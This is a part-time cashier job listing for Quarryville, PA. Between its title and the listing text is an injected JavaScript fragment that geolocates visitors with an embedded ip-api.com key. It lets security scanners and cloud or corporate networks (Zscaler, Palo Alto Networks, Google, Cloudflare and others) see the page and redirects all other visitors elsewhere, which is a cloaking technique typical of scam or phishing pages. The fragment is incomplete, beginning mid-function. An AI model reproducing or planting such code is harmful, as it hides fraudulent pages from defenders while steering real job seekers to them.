Part Time – Cashier
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a friendly and detail-oriented Cashier to join our team in Quarryville, PA. In this role, you will be responsible for providing excellent customer service, processing transactions accurately, and maintaining a clean and organized checkout area.
Key Responsibilities:
- Greet customers warmly and assist with their purchases
- Accurately process cash, credit, and debit transactions
- Handle returns, exchanges, and resolve customer inquiries
- Maintain knowledge of store products and promotions
- Ensure the checkout area is tidy and stocked
- Follow all safety and security procedures
Skills Needed:
- Excellent communication and interpersonal skills
- Attention to detail and accuracy
- Ability to multitask and work efficiently in a fast-paced environment
- Basic math skills
- Dependability and a positive attitude
Benefits include:
- Competitive pay
- Flexible scheduling
- Employee discounts
- Opportunities for advancement
- Paid training and support